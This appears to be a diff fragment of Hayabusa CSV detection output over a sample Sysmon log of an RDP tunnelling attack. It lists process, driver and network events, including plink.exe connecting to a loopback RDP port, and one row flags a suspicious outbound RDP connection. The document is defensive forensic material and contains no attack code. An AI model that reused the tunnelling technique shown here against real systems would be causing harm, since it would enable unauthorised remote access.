+2019-02-16 19:04:04.221 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\smss.exe | PID: 3444 | PGUID: 365ABB72-E014-5C67-0000-0010FCA01500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.221 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2516 | PGUID: 365ABB72-E014-5C67-0000-001013A21500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\rdpdd.dll | Status: Valid | Hash: SHA1=853533AD0FD5081E57931D98CF5B1CD4ACBF0601,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\rdpdd.dll | Status: Valid | Hash: SHA1=853533AD0FD5081E57931D98CF5B1CD4ACBF0601,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\rdpdd.dll | Signature: Microsoft Windows,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.231 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\rdpdd.dll | Signature: Microsoft Windows,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.351 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3780 | PGUID: 365ABB72-E014-5C67-0000-001023A71500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 3064 | PGUID: 365ABB72-E014-5C67-0000-001024B71500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 3204 | PGUID: 365ABB72-E014-5C67-0000-001090B71500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.962 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\smss.exe | PID: 3064 | PGUID: 365ABB72-E014-5C67-0000-001024B71500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.962 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 2988 | PGUID: 365ABB72-E014-5C67-0000-001094B81500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49187 (PC01.example.corp) | Dst: 127.0.0.2:3389 () | User: PC01\IEUser | Process: C:\Users\IEUser\Desktop\plink.exe | PID: 2312 | PGUID: 365ABB72-DFAD-5C67-0000-0010E0811500,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.2:3389 () | Dst: 127.0.0.1:49187 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,high,LatMov,Suspicious Outbound RDP Connections,,../hayabusa-rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\vga.dll | Status: Valid | Hash: SHA1=00F4056FD5FE28EC255B4521EE18C700BCF9CEEB,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\vga.dll | Signature: Microsoft Windows,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.122 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.283 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 2920 | PGUID: 365ABB72-E015-5C67-0000-00103FC01500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.563 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\TSTheme.exe -Embedding | Process: C:\Windows\System32\TSTheme.exe | User: PC01\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x26656 | PID: 3712 | PGUID: 365ABB72-E015-5C67-0000-0010D0C61500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:06.200 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\LogonUI.exe | PID: 3780 | PGUID: 365ABB72-E014-5C67-0000-001023A71500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:06.200 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\winlogon.exe | PID: 2516 | PGUID: 365ABB72-E014-5C67-0000-001013A21500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:06.410 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\csrss.exe | PID: 3344 | PGUID: 365ABB72-E014-5C67-0000-00104AA11500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:06.971 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\TSTheme.exe | PID: 3712 | PGUID: 365ABB72-E015-5C67-0000-0010D0C61500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:49478 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:61795 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: fe80:0:0:0:647b:25b7:1cc4:b972:49478 (PC02) | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:5355 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:61795 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:57255 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:57255 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:137 (PC01.example.corp) | Dst: 10.0.2.18:137 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:22.794 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49184 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:25.488 +09:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,../hayabusa-rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:25.488 +09:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,../hayabusa-rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:26.499 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: PC01\IEUser | Parent Cmd: winlogon.exe | LID: 0x26656 | PID: 1908 | PGUID: 365ABB72-E066-5C67-0000-00107A001600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:26.529 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\LogonUI.exe | PID: 2920 | PGUID: 365ABB72-E015-5C67-0000-00103FC01500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:26.529 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\winlogon.exe | PID: 2988 | PGUID: 365ABB72-E014-5C67-0000-001094B81500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:26.539 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\csrss.exe | PID: 3204 | PGUID: 365ABB72-E014-5C67-0000-001090B71500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:26.539 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\AtBroker.exe | PID: 1908 | PGUID: 365ABB72-E066-5C67-0000-00107A001600,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:63309 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:51695 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:51695 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:62259 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49185 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:59302 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:62053 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:62053 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:61049 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49186 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:52122 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:55679 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:52894 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:52894 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:64257 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49187 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:3702 () | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:3702 () | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: 0:0:0:0:0:0:0:1:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
